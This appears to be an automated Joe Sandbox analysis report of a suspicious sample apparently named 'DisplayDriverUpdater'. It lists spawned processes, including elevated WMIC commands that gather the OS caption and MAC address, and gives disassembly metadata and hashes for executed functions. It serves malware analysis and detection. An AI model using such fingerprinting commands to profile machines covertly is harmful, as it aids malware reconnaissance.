                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:46
                                                                            Start time:09:27:31
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:wmic os get caption
                                                                            Imagebase:0x7ff68c4a0000
                                                                            File size:576'000 bytes
                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:47
                                                                            Start time:09:27:31
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:48
                                                                            Start time:09:27:32
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\wbem\WMIC.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:wmic NIC get MACAddress
                                                                            Imagebase:0x7ff68c4a0000
                                                                            File size:576'000 bytes
                                                                            MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            General

                                                                            Target ID:49
                                                                            Start time:09:27:32
                                                                            Start date:03/12/2024
                                                                            Path:C:\Windows\System32\conhost.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                            Imagebase:0x7ff6d64d0000
                                                                            File size:862'208 bytes
                                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Disassembly

                                                                            Reset < >

                                                                              Executed Functions

                                                                              Function 0081BB60 Relevance: .1, Instructions: 57COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2722475181.00000000007A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007A0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2722446813.00000000007A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722630406.00000000009E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722786094.0000000000C22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722812738.0000000000C26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722843234.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722864868.0000000000C4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722885502.0000000000C4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722907316.0000000000C50000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722927763.0000000000C51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722927763.0000000000C75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722927763.0000000000C9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2723008271.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2723035575.0000000000CB8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2723058174.0000000000CB9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a0000_SplpM1fFkV.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                                              • Instruction ID: b9b0ac90b45134520aaf4aacfd09367ba22483f8d21bdaed076d9964ed6b7902
                                                                              • Opcode Fuzzy Hash: b65c2346c372a812bf9a5a497f7710ebe99c163a2b211cbfcde99684ffbfdf79
                                                                              • Instruction Fuzzy Hash: 96319C2791CFC482D3218B24F5413AAB364F7A9784F15A715EFC852A1ADF38E2E5CB40
                                                                              Function 00817EC0 Relevance: .0, Instructions: 2COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.2722475181.00000000007A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007A0000, based on PE: true
                                                                              • Associated: 00000000.00000002.2722446813.00000000007A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722630406.00000000009E8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722786094.0000000000C22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722812738.0000000000C26000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722843234.0000000000C49000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722864868.0000000000C4A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722885502.0000000000C4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722907316.0000000000C50000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722927763.0000000000C51000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722927763.0000000000C75000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2722927763.0000000000C9C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2723008271.0000000000CA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2723035575.0000000000CB8000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.2723058174.0000000000CB9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_7a0000_SplpM1fFkV.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: fca213f1bdf3310e9a94cd93af76609da0480219288d0018515767d04fedc901
                                                                              • Instruction ID: ee9edf71a4e7c033dc18833c1f4b49560ee91760d7cec22b7bb8f7b6c048aac4
                                                                              • Opcode Fuzzy Hash: fca213f1bdf3310e9a94cd93af76609da0480219288d0018515767d04fedc901
                                                                              • Instruction Fuzzy Hash:

                                                                              Execution Graph

                                                                              Execution Coverage:18.8%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:11
                                                                              Total number of Limit Nodes:1
                                                                              execution_graph 16545 7ff848f2d4f9 16547 7ff848f2d549 16545->16547 16546 7ff848f2d552 16547->16546 16548 7ff848f2d67d CreateFileW 16547->16548 16549 7ff848f2d6de 16548->16549 16550 7ff848f2d810 16551 7ff848f2d819 SetConsoleMode 16550->16551 16553 7ff848f2d8b9 16551->16553 16554 7ff848f2d711 16555 7ff848f2d71f GetConsoleMode 16554->16555 16557 7ff848f2d7d4 16555->16557

                                                                              Executed Functions

                                                                              Function 00007FF848F26DA0 Relevance: 3.8, Strings: 2, Instructions: 1262COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 7ff848f26da0-7ff848f2c3c0 5 7ff848f2c3cc-7ff848f2c403 0->5 6 7ff848f2c3c2-7ff848f2c3c7 call 7ff848f26e00 0->6 9 7ff848f2c409-7ff848f2c414 5->9 10 7ff848f2c5f4-7ff848f2c609 5->10 6->5 11 7ff848f2c482-7ff848f2c495 9->11 12 7ff848f2c416-7ff848f2c41e 9->12 18 7ff848f2c60b-7ff848f2c612 10->18 19 7ff848f2c613-7ff848f2c61d 10->19 11->10 20 7ff848f2c49b-7ff848f2c535 11->20 12->10 13 7ff848f2c424-7ff848f2c439 12->13 16 7ff848f2c43b-7ff848f2c460 13->16 17 7ff848f2c462-7ff848f2c46d 13->17 16->17 17->10 23 7ff848f2c473-7ff848f2c480 17->23 18->19 24 7ff848f2c61e 19->24 25 7ff848f2c61f-7ff848f2c65e 19->25 20->10 26 7ff848f2c53b-7ff848f2c556 20->26 23->11 23->12 24->25 33 7ff848f2c67b-7ff848f2c68c 25->33 34 7ff848f2c660-7ff848f2c666 25->34 26->10 28 7ff848f2c55c-7ff848f2c56f 26->28 28->10 30 7ff848f2c575-7ff848f2c586 28->30 30->10 35 7ff848f2c588-7ff848f2c597 30->35 38 7ff848f2c68e-7ff848f2c699 33->38 39 7ff848f2c69d-7ff848f2c6c0 33->39 36 7ff848f2c668-7ff848f2c679 34->36 37 7ff848f2c6c1-7ff848f2c703 34->37 40 7ff848f2c599-7ff848f2c5a4 35->40 41 7ff848f2c5e2-7ff848f2c5f3 35->41 36->33 36->34 50 7ff848f2c704-7ff848f2c73a 37->50 39->50 40->41 47 7ff848f2c5a6-7ff848f2c5dd call 7ff848f26e20 40->47 47->41 54 7ff848f2c74e-7ff848f2c75f 50->54 55 7ff848f2c73c-7ff848f2c74c 50->55 57 7ff848f2c770-7ff848f2c7a1 54->57 58 7ff848f2c761-7ff848f2c76f 54->58 55->54 55->55 64 7ff848f2c7a3-7ff848f2c7a9 57->64 65 7ff848f2c7f7-7ff848f2c7fe 57->65 58->57 64->65 66 7ff848f2c7ab-7ff848f2c7ac 64->66 67 7ff848f2c83f-7ff848f2c868 65->67 68 7ff848f2c800-7ff848f2c801 65->68 69 7ff848f2c7af-7ff848f2c7b2 66->69 70 7ff848f2c804-7ff848f2c807 68->70 71 7ff848f2c7b8-7ff848f2c7c8 69->71 72 7ff848f2c869-7ff848f2c932 69->72 70->72 73 7ff848f2c809-7ff848f2c81a 70->73 75 7ff848f2c7ca-7ff848f2c7ec 71->75 76 7ff848f2c7f0-7ff848f2c7f5 71->76 88 7ff848f2c93b-7ff848f2c93f 72->88 89 7ff848f2c934-7ff848f2c939 72->89 77 7ff848f2c81c-7ff848f2c822 73->77 78 7ff848f2c836-7ff848f2c83d 73->78 75->76 76->65 76->69 77->72 82 7ff848f2c824-7ff848f2c832 77->82 78->67 78->70 82->78 90 7ff848f2c942-7ff848f2ca2c call 7ff848f24620 88->90 89->90 104 7ff848f2ca2e-7ff848f2ca33 90->104 105 7ff848f2ca35-7ff848f2ca39 90->105 106 7ff848f2ca3c-7ff848f2ca87 104->106 105->106 110 7ff848f2ca89-7ff848f2ca8e 106->110 111 7ff848f2ca90-7ff848f2ca94 106->111 112 7ff848f2ca97-7ff848f2cbb6 110->112 111->112 127 7ff848f2cbb8-7ff848f2cbba 112->127 128 7ff848f2cbbc-7ff848f2cbd5 112->128 130 7ff848f2cbd7-7ff848f2cbe5 127->130 128->130 131 7ff848f2cbeb-7ff848f2cc5c call 7ff848f27c08 130->131 132 7ff848f2cc72-7ff848f2cc9e 130->132 165 7ff848f2cc5e-7ff848f2cc61 131->165 166 7ff848f2cc63-7ff848f2cc6b 131->166 133 7ff848f2cd58-7ff848f2cd98 132->133 134 7ff848f2cca4-7ff848f2cd51 call 7ff848f27bb8 132->134 144 7ff848f2ce89-7ff848f2ce97 call 7ff848f2cf2e 133->144 145 7ff848f2cd9e-7ff848f2cdac 133->145 134->133 156 7ff848f2ceaa-7ff848f2ceb5 144->156 157 7ff848f2ce99-7ff848f2cea7 144->157 148 7ff848f2cdb2-7ff848f2cdbd 145->148 149 7ff848f2ce41-7ff848f2ce67 145->149 158 7ff848f2ce6c-7ff848f2ce6f 149->158 167 7ff848f2cf0d-7ff848f2cf2d 156->167 168 7ff848f2ceb7-7ff848f2cec6 call 7ff848f22ed8 156->168 157->156 162 7ff848f2ce82-7ff848f2ce86 158->162 163 7ff848f2ce71-7ff848f2ce81 158->163 162->144 163->162 165->166 166->132 173 7ff848f2cecb-7ff848f2cefb 168->173 173->167
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ZM_H$d
                                                                              • API String ID: 0-3932459425
                                                                              • Opcode ID: e76b959d4076bad95f65677b5ba20936f6f3d2d0d51f5346ffdb50579c81fc4b
                                                                              • Instruction ID: f601c335846f18dfe0308fa77d5ff9d868ecfea322df973e0e37e8b3f75a64cb
                                                                              • Opcode Fuzzy Hash: e76b959d4076bad95f65677b5ba20936f6f3d2d0d51f5346ffdb50579c81fc4b
                                                                              • Instruction Fuzzy Hash: F6827830A1DA8A4FE758EB2C94556B577E1FF59350F1442BAC04EC72D6EF2AE8438780
                                                                              Function 00007FF848F26E20 Relevance: 2.0, Strings: 1, Instructions: 760COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 998 7ff848f26e20-7ff848f2c73a 1002 7ff848f2c74e-7ff848f2c75f 998->1002 1003 7ff848f2c73c-7ff848f2c74c 998->1003 1004 7ff848f2c770-7ff848f2c7a1 1002->1004 1005 7ff848f2c761-7ff848f2c76f 1002->1005 1003->1002 1003->1003 1009 7ff848f2c7a3-7ff848f2c7a9 1004->1009 1010 7ff848f2c7f7-7ff848f2c7fe 1004->1010 1005->1004 1009->1010 1011 7ff848f2c7ab-7ff848f2c7ac 1009->1011 1012 7ff848f2c83f-7ff848f2c868 1010->1012 1013 7ff848f2c800-7ff848f2c801 1010->1013 1014 7ff848f2c7af-7ff848f2c7b2 1011->1014 1015 7ff848f2c804-7ff848f2c807 1013->1015 1016 7ff848f2c7b8-7ff848f2c7c8 1014->1016 1017 7ff848f2c869-7ff848f2c932 1014->1017 1015->1017 1018 7ff848f2c809-7ff848f2c81a 1015->1018 1020 7ff848f2c7ca-7ff848f2c7ec 1016->1020 1021 7ff848f2c7f0-7ff848f2c7f5 1016->1021 1033 7ff848f2c93b-7ff848f2c93f 1017->1033 1034 7ff848f2c934-7ff848f2c939 1017->1034 1022 7ff848f2c81c-7ff848f2c822 1018->1022 1023 7ff848f2c836-7ff848f2c83d 1018->1023 1020->1021 1021->1010 1021->1014 1022->1017 1027 7ff848f2c824-7ff848f2c832 1022->1027 1023->1012 1023->1015 1027->1023 1035 7ff848f2c942-7ff848f2c9c5 1033->1035 1034->1035 1042 7ff848f2c9cd-7ff848f2c9d4 call 7ff848f24620 1035->1042 1044 7ff848f2c9d9-7ff848f2ca2c 1042->1044 1049 7ff848f2ca2e-7ff848f2ca33 1044->1049 1050 7ff848f2ca35-7ff848f2ca39 1044->1050 1051 7ff848f2ca3c-7ff848f2ca48 1049->1051 1050->1051 1052 7ff848f2ca4f-7ff848f2ca87 1051->1052 1055 7ff848f2ca89-7ff848f2ca8e 1052->1055 1056 7ff848f2ca90-7ff848f2ca94 1052->1056 1057 7ff848f2ca97-7ff848f2cb84 1055->1057 1056->1057 1069 7ff848f2cb8c-7ff848f2cb93 1057->1069 1070 7ff848f2cb9a-7ff848f2cbb6 1069->1070 1072 7ff848f2cbb8-7ff848f2cbba 1070->1072 1073 7ff848f2cbbc-7ff848f2cbd5 1070->1073 1075 7ff848f2cbd7-7ff848f2cbe5 1072->1075 1073->1075 1076 7ff848f2cbeb-7ff848f2cc5c call 7ff848f27c08 1075->1076 1077 7ff848f2cc72-7ff848f2cc9e 1075->1077 1110 7ff848f2cc5e-7ff848f2cc61 1076->1110 1111 7ff848f2cc63-7ff848f2cc6b 1076->1111 1078 7ff848f2cd58-7ff848f2cd91 1077->1078 1079 7ff848f2cca4-7ff848f2cd18 1077->1079 1086 7ff848f2cd96-7ff848f2cd98 1078->1086 1109 7ff848f2cd22-7ff848f2cd2f call 7ff848f27bb8 1079->1109 1089 7ff848f2ce89-7ff848f2ce97 call 7ff848f2cf2e 1086->1089 1090 7ff848f2cd9e-7ff848f2cdac 1086->1090 1101 7ff848f2ceaa-7ff848f2ceb5 1089->1101 1102 7ff848f2ce99-7ff848f2cea7 1089->1102 1093 7ff848f2cdb2-7ff848f2cdbd 1090->1093 1094 7ff848f2ce41-7ff848f2ce67 1090->1094 1103 7ff848f2ce6c-7ff848f2ce6f 1094->1103 1112 7ff848f2cf0d-7ff848f2cf2d 1101->1112 1113 7ff848f2ceb7-7ff848f2cec6 call 7ff848f22ed8 1101->1113 1102->1101 1107 7ff848f2ce82-7ff848f2ce86 1103->1107 1108 7ff848f2ce71-7ff848f2ce81 1103->1108 1107->1089 1108->1107 1117 7ff848f2cd34-7ff848f2cd3e 1109->1117 1110->1111 1111->1077 1118 7ff848f2cecb-7ff848f2cefb 1113->1118 1119 7ff848f2cd40-7ff848f2cd51 1117->1119 1118->1112 1119->1078
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: ZM_H
                                                                              • API String ID: 0-3096618608
                                                                              • Opcode ID: 4a4807211fdbbd6c40414d70374a91b334350618ec52830b9935259fcd8ebe9a
                                                                              • Instruction ID: 7f2c87d4078a70f4d21a56bc0d218c54a41341a1216d97b144a2da11380bfc07
                                                                              • Opcode Fuzzy Hash: 4a4807211fdbbd6c40414d70374a91b334350618ec52830b9935259fcd8ebe9a
                                                                              • Instruction Fuzzy Hash: 8A223A31A1DA8A4FE798EB2C94556B577E1FF59350F1442BAC04EC32D6EF2DA8438780
                                                                              Function 00007FF848F2DC18 Relevance: .9, Instructions: 918COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 61afbc15c449efde15fc091dd0b9122e74f4c512eff60df0b97cdc03c80b31a3
                                                                              • Instruction ID: 4f5e19e645235ea54e0d596d76ccdb0d05c7a82ef08f9df7233933034c9b16f4
                                                                              • Opcode Fuzzy Hash: 61afbc15c449efde15fc091dd0b9122e74f4c512eff60df0b97cdc03c80b31a3
                                                                              • Instruction Fuzzy Hash: 79422931F1DE464FE799AB2C582517437D2EFA9A54F4802BFD04ED32D7DE19AC028289
                                                                              Function 00007FF848F2F658 Relevance: .6, Instructions: 613COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 75535c8f23330ee0d470a053404fa0b8c8e00a1efc97efce28d659f5c184c56e
                                                                              • Instruction ID: a1335cd4b0a58e605ff990645ec0dc1cbeb90aa6ea07ee67a67b0728646e9f9a
                                                                              • Opcode Fuzzy Hash: 75535c8f23330ee0d470a053404fa0b8c8e00a1efc97efce28d659f5c184c56e
                                                                              • Instruction Fuzzy Hash: C902F530A1CA465FE75CBB2894566B9B3D2FF98784F54417DE44EC32C3DF29B8028689
                                                                              Function 00007FF848F2D4F9 Relevance: 1.7, APIs: 1, Instructions: 244fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1223 7ff848f2d4f9-7ff848f2d550 call 7ff848f245d0 1226 7ff848f2d552-7ff848f2d580 1223->1226 1227 7ff848f2d581-7ff848f2d5a3 1223->1227 1232 7ff848f2d5a4-7ff848f2d5d5 1227->1232 1236 7ff848f2d5d7-7ff848f2d673 1232->1236 1242 7ff848f2d67d-7ff848f2d6dc CreateFileW 1236->1242 1243 7ff848f2d675-7ff848f2d67a 1236->1243 1244 7ff848f2d6de 1242->1244 1245 7ff848f2d6e4-7ff848f2d70c 1242->1245 1243->1242 1244->1245
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 5cf299165e2700fdc9af8d8a9d3da91169a8b9d66e0d0286e02786bba2c04522
                                                                              • Instruction ID: fed13fa67c3b3ab36b544aa7933bc5cee5614e893e71d611426bde8ae0d52198
                                                                              • Opcode Fuzzy Hash: 5cf299165e2700fdc9af8d8a9d3da91169a8b9d66e0d0286e02786bba2c04522
                                                                              • Instruction Fuzzy Hash: 6171167190DA4C4FE758EF6C984A6B97BE0FF59350F0402BEE04DD3292DB75A8028B85
                                                                              Function 00007FF848F245C2 Relevance: 1.6, APIs: 1, Instructions: 134fileCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1304 7ff848f245c2-7ff848f245c3 1305 7ff848f245d8-7ff848f2d673 1304->1305 1306 7ff848f245c5 1304->1306 1310 7ff848f2d67d-7ff848f2d6dc CreateFileW 1305->1310 1311 7ff848f2d675-7ff848f2d67a 1305->1311 1306->1305 1312 7ff848f2d6de 1310->1312 1313 7ff848f2d6e4-7ff848f2d70c 1310->1313 1311->1310 1312->1313
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 436687615c2b734212f4304bc49ab83964d91511d2e50d99d76fc42baaa180ef
                                                                              • Instruction ID: c825eb2a62e5f147c6d87dbef47e2b88a23df90ea82ff79013fa9ecf77683994
                                                                              • Opcode Fuzzy Hash: 436687615c2b734212f4304bc49ab83964d91511d2e50d99d76fc42baaa180ef
                                                                              • Instruction Fuzzy Hash: F931B33191CA1C9FDB58EF58D845AF97BE0FB69311F00422EE04EE3251DB75A8428BC5
                                                                              Function 00007FF848F2D711 Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1363 7ff848f2d711-7ff848f2d71d 1364 7ff848f2d728-7ff848f2d7d2 GetConsoleMode 1363->1364 1365 7ff848f2d71f-7ff848f2d727 1363->1365 1368 7ff848f2d7da-7ff848f2d808 1364->1368 1369 7ff848f2d7d4 1364->1369 1365->1364 1369->1368
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleMode
                                                                              • String ID:
                                                                              • API String ID: 4145635619-0
                                                                              • Opcode ID: 425edad10f401b4cce930142c6d31d24af14b911abecae0d6715b0d35ce40571
                                                                              • Instruction ID: 2847608098d320951bc6a8b98957e9e5ebd58972817e68083dfe2a0c3bf21f4c
                                                                              • Opcode Fuzzy Hash: 425edad10f401b4cce930142c6d31d24af14b911abecae0d6715b0d35ce40571
                                                                              • Instruction Fuzzy Hash: 1331393190C65C8FCB58EFA8D8457E97BF0EF56320F0442ABD409D7682CB749845CB91
                                                                              Function 00007FF848F2D810 Relevance: 1.6, APIs: 1, Instructions: 106COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 1371 7ff848f2d810-7ff848f2d817 1372 7ff848f2d819-7ff848f2d821 1371->1372 1373 7ff848f2d822-7ff848f2d8b7 SetConsoleMode 1371->1373 1372->1373 1376 7ff848f2d8b9 1373->1376 1377 7ff848f2d8bf-7ff848f2d8ed 1373->1377 1376->1377
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3277726618.00007FF848F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F20000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848f20000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID: ConsoleMode
                                                                              • String ID:
                                                                              • API String ID: 4145635619-0
                                                                              • Opcode ID: c920c934e679cc3daab54a0d6915d176b420e7d3275017a993a33ca2c83807da
                                                                              • Instruction ID: b7e849386312ab168d9f7ee0fbfe1a33739c5bd4098ad3a7494dec3b7992b15f
                                                                              • Opcode Fuzzy Hash: c920c934e679cc3daab54a0d6915d176b420e7d3275017a993a33ca2c83807da
                                                                              • Instruction Fuzzy Hash: A031F63090C6488FEB58EFA8D84A7F97BE0EF55321F04426FD449C7292CB79A855CB91
                                                                              Function 00007FF848FF15DD Relevance: .6, Instructions: 634COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3278120826.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848ff0000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 39d874306e4d9a5f4d796f4db30e96d5a7109d1689dbdca9673868046ef153ca
                                                                              • Instruction ID: a7a5ef90853743909d42e8121d73f3829a9b31f74155a1f97722411283aab598
                                                                              • Opcode Fuzzy Hash: 39d874306e4d9a5f4d796f4db30e96d5a7109d1689dbdca9673868046ef153ca
                                                                              • Instruction Fuzzy Hash: 6B12D23290EBC55FE357A73858151B47FE1EF526A0F1901FBD188C71E3EA189886C396
                                                                              Function 00007FF848FF12F9 Relevance: .4, Instructions: 365COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3278120826.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848ff0000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 31981ae24f94e0cf79390018631e68cf3745d87d0d369bc7c634fadf13486a7d
                                                                              • Instruction ID: 67965bc25c7b57745a8e94897ea5c32c28efc495e47ceb81d36dac9d58879fb3
                                                                              • Opcode Fuzzy Hash: 31981ae24f94e0cf79390018631e68cf3745d87d0d369bc7c634fadf13486a7d
                                                                              • Instruction Fuzzy Hash: FCA16732D0EA8D5FE76AEB2858455B63BE0EF86360F0801BFD14DC71D3EB18A8568355
                                                                              Function 00007FF848FF17FD Relevance: .1, Instructions: 90COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 0000002A.00000002.3278120826.00007FF848FF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848FF0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_42_2_7ff848ff0000_DisplayDriverUpdater.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 4cb68d235fd45ccbddb069dc30cf1fb31f167fddf58697519d4502e3697b597e
